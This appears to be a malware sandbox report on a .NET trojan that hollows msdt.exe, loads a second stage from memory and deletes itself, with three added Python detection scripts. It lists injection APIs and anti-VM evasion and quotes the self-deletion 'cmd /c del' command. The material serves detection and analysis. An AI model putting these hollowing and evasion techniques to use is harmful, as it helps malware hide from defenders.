Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929A10 NtQuerySection
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019295F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0192AD30 NtSetContextThread
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929560 NtWriteFile
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0192A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_0192A770 NtOpenThread
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929770 NtSetInformationFile
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929760 NtOpenProcess
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_019296D0 NtCreateKey
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929650 NtQueryValueKey
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe; Code function: 7_2_01929670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047695D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769650 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047696E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047696D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047699A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769560 NtWriteFile
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_0476AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047695F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_0476A770 NtOpenThread
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769770 NtSetInformationFile
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769760 NtOpenProcess
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_0476A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047697A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_0476B040 NtSuspendThread
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_04769820 NtEnumerateKey
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047698F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 13_2_047698A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769950 NtQueueApcThread,13_2_04769950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047699D0 NtCreateProcessEx,13_2_047699D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A20 NtResumeThread,13_2_04769A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A10 NtQuerySection,13_2_04769A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A00 NtProtectVirtualMemory,13_2_04769A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A80 NtOpenDirectoryObject,13_2_04769A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769B00 NtSetValueKey,13_2_04769B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A3B0 NtGetContextThread,13_2_0476A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D18690 NtReadFile,13_2_02D18690
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D187C0 NtAllocateVirtualMemory,13_2_02D187C0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D18710 NtClose,13_2_02D18710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D185E0 NtCreateFile,13_2_02D185E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D187BC NtAllocateVirtualMemory,13_2_02D187BC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1873A NtReadFile,13_2_02D1873A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D185DA NtCreateFile,13_2_02D185DA
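The native-function list for msdt.exe (process 13) is not a random sample of ntdll: NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtProtectVirtualMemory, NtSetContextThread, NtQueueApcThread and NtResumeThread are exactly the calls a process-hollowing loader needs, and every one of them is resolved at an 0x0476xxxx address, inside the 0x04700000 region that the pdb lines further down attribute to a second copy of ntdll (wntdll.pdb) rather than the one the loader mapped. The script below is an added example, not part of the sandbox report or of any vendor tooling: it parses "Code function" records in the shape printed above (the sample input is a constructed subset of those lines), groups the NT functions per sandbox process id, and scores each process against the stages of classic hollowing. The stage table and the 80% coverage threshold are assumptions for illustration.

```python
"""Score a process's resolved NT syscall stubs against the stages a
process-hollowing loader needs.  Added example; not part of the report."""
import re

# Constructed input: 'Code function' records in the shape the report prints
# them (process_run_address NtName), copied from the listing above.
REPORT_LINES = """\
7_2_01929770 NtSetInformationFile
7_2_01929760 NtOpenProcess
7_2_019296D0 NtCreateKey
7_2_01929670 NtQueryInformationProcess
13_2_04769780 NtMapViewOfSection
13_2_047699A0 NtCreateSection
13_2_047699D0 NtCreateProcessEx
13_2_047697A0 NtUnmapViewOfSection
13_2_047698A0 NtWriteVirtualMemory
13_2_04769A00 NtProtectVirtualMemory
13_2_0476A3B0 NtGetContextThread
13_2_0476AD30 NtSetContextThread
13_2_04769950 NtQueueApcThread
13_2_04769A20 NtResumeThread
"""

# Assumption: each stage of classic hollowing and the NT calls that can
# implement it.  A process touching almost all stages is worth a look.
HOLLOWING_STAGES = {
    "create_or_open_target": {"NtCreateProcessEx", "NtCreateUserProcess", "NtOpenProcess"},
    "evict_or_replace_image": {"NtUnmapViewOfSection", "NtMapViewOfSection"},
    "write_payload":          {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "make_executable":        {"NtProtectVirtualMemory", "NtMapViewOfSection"},
    "hijack_execution":       {"NtSetContextThread", "NtQueueApcThread"},
    "resume":                 {"NtResumeThread", "NtAlertResumeThread"},
}

LINE_RE = re.compile(
    r"^(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-F]+)\s+(?P<api>Nt\w+)", re.I)


def apis_by_process(text):
    """Map sandbox process id -> set of NT functions resolved in that process."""
    out = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out.setdefault(int(m["pid"]), set()).add(m["api"])
    return out


def hollowing_coverage(apis):
    """Return (stages_hit, stages_total, missing_stages) for one API set."""
    hit = {stage for stage, choices in HOLLOWING_STAGES.items() if apis & choices}
    return len(hit), len(HOLLOWING_STAGES), sorted(set(HOLLOWING_STAGES) - hit)


def flag_hollowing(text, min_fraction=0.8):
    """Process ids whose NT stubs cover at least min_fraction of the stages."""
    flagged = {}
    for pid, apis in apis_by_process(text).items():
        hit, total, missing = hollowing_coverage(apis)
        if hit / total >= min_fraction:
            flagged[pid] = {"hit": hit, "total": total, "missing": missing}
    return flagged


if __name__ == "__main__":
    for pid, info in flag_hollowing(REPORT_LINES).items():
        print(f"pid {pid}: {info['hit']}/{info['total']} hollowing stages, "
              f"missing {info['missing']}")
```

On the report's own data only process 13 (msdt.exe) reaches full coverage; process 7 resolves NtOpenProcess and nothing else from the table. Because every process that loads ntdll exports these functions, the set alone is a weak signal; feed the scorer only stubs resolved outside the legitimately mapped ntdll image, which is what the 0x0476xxxx addresses above indicate.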
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291189120.0000000000C80000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294459774.0000000006490000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294190854.0000000006030000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe, 00000007.00000000.286959339.0000000000ED0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348145495.0000000001B6F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe Binary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
Source: HkE0tD0g4NXKJfy.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: HkE0tD0g4NXKJfy.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe File read: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe:Zone.Identifier
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Process created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HkE0tD0g4NXKJfy.exe.log
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@13/4
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_01
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: HkE0tD0g4NXKJfy.exe String found in binary or memory: /ReturnValueNameAttribu;component/views/addbook.xaml
Source: HkE0tD0g4NXKJfy.exe String found in binary or memory: views/addbook.baml
Source: HkE0tD0g4NXKJfy.exe String found in binary or memory: /ReturnValueNameAttribu;component/views/addcustomer.xaml
Source: HkE0tD0g4NXKJfy.exe String found in binary or memory: views/addcustomer.baml
Source: HkE0tD0g4NXKJfy.exe String found in binary or memory: i/ReturnValueNameAttribu;component/views/addbook.xaml
Source: HkE0tD0g4NXKJfy.exe String found in binary or memory: /ReturnValueNameAttribu;component/views/borrowfrombookview.xamlu/ReturnValueNameAttribu;component/views/borrowingview.xamlo/ReturnValueNameAttribu;component/views/changebook.xamlw/ReturnValueNameAttribu;component/views/changecustomer.xamls/ReturnValueNameAttribu;component/views/customerview.xamlw/ReturnValueNameAttribu;component/views/deletecustomer.xamlm/ReturnValueNameAttribu;component/views/errorview.xamlq/ReturnValueNameAttribu;component/views/smallextras.xamlq/ReturnValueNameAttribu;component/views/addcustomer.xaml
Source: HkE0tD0g4NXKJfy.exe String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\msdt.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: HkE0tD0g4NXKJfy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: HkE0tD0g4NXKJfy.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HkE0tD0g4NXKJfy.exe, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: HkE0tD0g4NXKJfy.exe, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.HkE0tD0g4NXKJfy.exe.c10000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.HkE0tD0g4NXKJfy.exe.c10000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.9.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.HkE0tD0g4NXKJfy.exe.e60000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.5.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.HkE0tD0g4NXKJfy.exe.e60000.7.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 0_2_00C192F5 push ds; ret 0_2_00C19340
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 0_2_00C19347 push ds; ret 0_2_00C1934C
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 0_2_00C19361 push ds; retf 0_2_00C19364
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_0041B822 push eax; ret 7_2_0041B828
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_0041B82B push eax; ret 7_2_0041B892
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_0041B88C push eax; ret 7_2_0041B892
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_0041C529 push esi; ret 7_2_0041C758
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_0041B7D5 push eax; ret 7_2_0041B828
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_00E692F5 push ds; ret 7_2_00E69340
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_00E69361 push ds; retf 7_2_00E69364
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_00E69347 push ds; ret 7_2_00E6934C
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Code function: 7_2_0193D0D1 push ecx; ret 7_2_0193D0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 13_2_0477D0D1 push ecx; ret 13_2_0477D0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 13_2_02D1B88C push eax; ret 13_2_02D1B892
Source: C:\Windows\SysWOW64\msdt.exe Code function: 13_2_02D1B822 push eax; ret 13_2_02D1B828
Source: C:\Windows\SysWOW64\msdt.exe Code function: 13_2_02D1B82B push eax; ret 13_2_02D1B892
Source: C:\Windows\SysWOW64\msdt.exe Code function: 13_2_02D1BE43 push esi; retf 13_2_02D1BE49
Source: C:\Windows\SysWOW64\msdt.exe Code function: 13_2_02D1B7D5 push eax; ret 13_2_02D1B828
Source: initial sample Static PE information: section name: .text entropy: 7.85414523612
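The two static facts in this section belong together: a .NET assembly whose .text section (which in a managed PE holds the IL, the metadata and any embedded resources) has an entropy of 7.854 out of a possible 8.0, and a MainWindow class that calls System.Reflection.Assembly.Load(byte[]). That is the shape of a loader carrying an encrypted second stage that is decrypted in memory and never written to disk. The script below is an added example, not code from the report or from any vendor tool: a dependency-free section-entropy check that walks the PE section table directly. The build_minimal_pe helper exists only to produce a constructed test image (one section filled with maximally random bytes, one nearly constant); the 7.0 threshold is an assumption, chosen because ordinary IL and native code sections sit well below it.

```python
"""Per-section Shannon entropy for a PE image.  Added example; not part of
the report.  Pure standard library, so it runs anywhere."""
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def section_entropies(pe: bytes):
    """Parse the section table and return [(name, raw_size, entropy)]."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                          # IMAGE_FILE_HEADER (20 bytes)
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    sec = coff + 20 + opt_size                   # first IMAGE_SECTION_HEADER
    out = []
    for i in range(nsections):
        off = sec + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        data = pe[raw_ptr:raw_ptr + raw_size]
        out.append((name, raw_size, round(shannon_entropy(data), 3)))
    return out


def packed_sections(pe: bytes, threshold: float = 7.0):
    """Names of non-empty sections whose entropy is at or above threshold."""
    return [name for name, size, ent in section_entropies(pe) if size and ent >= threshold]


def build_minimal_pe(sections):
    """Constructed test image: DOS stub, PE signature, COFF header with an
    empty optional header, then one section header and raw block per
    (name, data, characteristics).  Enough for section_entropies(), not
    a loadable executable."""
    hdr_end = 0x40 + 4 + 20 + 40 * len(sections)
    raw_ptr = (hdr_end + 0x1FF) & ~0x1FF       # 512-byte file alignment
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    headers = bytes(dos) + b"PE\0\0" + coff
    body = b""
    for name, data, chars in sections:
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data),
                               0x1000, len(data), raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += data.ljust((len(data) + 0x1FF) & ~0x1FF, b"\0")
    return headers.ljust(raw_ptr, b"\0") + body


# Constructed sample: a .text with every byte value equally frequent (the
# static look of an encrypted blob) next to a nearly constant .rsrc.
HIGH_ENTROPY = bytes(range(256)) * 16
LOW_ENTROPY = b"\x00" * 4000 + b"\x90" * 96
SAMPLE_PE = build_minimal_pe([
    (b".text", HIGH_ENTROPY, 0x60000020),      # CODE | EXECUTE | READ, as in the report
    (b".rsrc", LOW_ENTROPY, 0x40000040),       # INITIALIZED_DATA | READ
])

if __name__ == "__main__":
    for name, size, ent in section_entropies(SAMPLE_PE):
        print(f"{name:8s} {size:6d} bytes  entropy {ent:.3f}")
    print("packed-looking:", packed_sections(SAMPLE_PE))
```

Run it against a real file with section_entropies(open(path, "rb").read()). A high-entropy .text on its own is not proof of packing (large compressed resources produce the same number), so treat it as the prompt to look for an in-memory loader such as the Assembly.Load(byte[]) call recorded above, and to dump the process after that call returns.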

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\msdt.exe Process created: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
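The process tree recorded earlier in this report and the self-deletion signature here describe the same chain: the sample starts a second copy of itself with no arguments, explorer.exe then starts msdt.exe with a bare command line, and msdt.exe, not the sample, runs cmd.exe /c del on the sample's own path. Each link can be checked mechanically from process-creation events. The script below is an added example, not part of the sandbox report or of any vendor tooling; the event records are reconstructed from the "Process created" lines above (the parent of the first process is not given, so it is left empty), and HOLLOW_HOSTS is an assumed short list of system binaries that normally carry arguments, to be tuned to the environment.

```python
"""Flag the process-tree patterns recorded in the report: self-respawn,
argument-free launch of a system binary, and self-deletion by proxy.
Added example; not part of the sandbox report or any vendor tooling."""
import re

# Constructed records in the shape of the 'Process created' lines:
# (parent image, child image, child command line).
PROCESS_EVENTS = [
    ("", r"C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe",
     r'"C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"'),
    (r"C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe", r"C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe",
     r"C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\msdt.exe",
     r"C:\Windows\SysWOW64\msdt.exe"),
    (r"C:\Windows\SysWOW64\msdt.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r'/c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"'),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Assumption: system binaries that normally take arguments, so a launch with
# a bare command line deserves a look.
HOLLOW_HOSTS = {"msdt.exe", "svchost.exe", "rundll32.exe", "wlanext.exe", "cmstp.exe"}

# cmd /c del [switches] "<path>"   (erase is a synonym of del)
DEL_RE = re.compile(
    r'/c\s+(?:del|erase)\s+(?:/[a-z]\s+)*"?(?P<path>[^"]+?)"?\s*$', re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def argument_free(image, cmdline):
    """True when the command line is nothing but the image path."""
    return cmdline.strip().strip('"').lower() == image.lower()


def find_sample(events):
    """The analysed sample: the first process whose parent is unknown."""
    for parent, child, _ in events:
        if not parent:
            return child
    return None


def analyse(events):
    sample = find_sample(events)
    findings = []
    for parent, child, cmd in events:
        # 1. a process starting a second copy of itself with no arguments
        if parent and parent.lower() == child.lower() and argument_free(child, cmd):
            findings.append(("self_respawn", child))
        # 2. a watched system binary launched with a bare command line
        if basename(child) in HOLLOW_HOSTS and argument_free(child, cmd):
            findings.append(("bare_system_binary",
                             f"{basename(parent)} -> {basename(child)}"))
        # 3. something other than the sample deleting the sample via cmd.exe
        m = DEL_RE.search(cmd) if basename(child) == "cmd.exe" else None
        if (m and sample and m["path"].lower() == sample.lower()
                and parent.lower() != sample.lower()):
            findings.append(("proxy_self_delete", f"{basename(parent)} deleted {sample}"))
    return findings


if __name__ == "__main__":
    for kind, detail in analyse(PROCESS_EVENTS):
        print(f"{kind:20s} {detail}")
```

The third check is the one that matters for response: the original file is gone by the time anyone looks, so the payload has to be recovered from msdt.exe's memory, not from disk. Note that explorer.exe is the parent of msdt.exe even though the sample is the process that injected into it; correlating on parent alone would miss the sample, which is why the check keys on the deleted path rather than on the process that issued the delete.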
Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe Process information set: NOOPENFILEERRORBOX (reported 56 times)
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (reported 5 times)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.HkE0tD0g4NXKJfy.exe.317b220.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.HkE0tD0g4NXKJfy.exe.30e8edc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, type: MEMORY
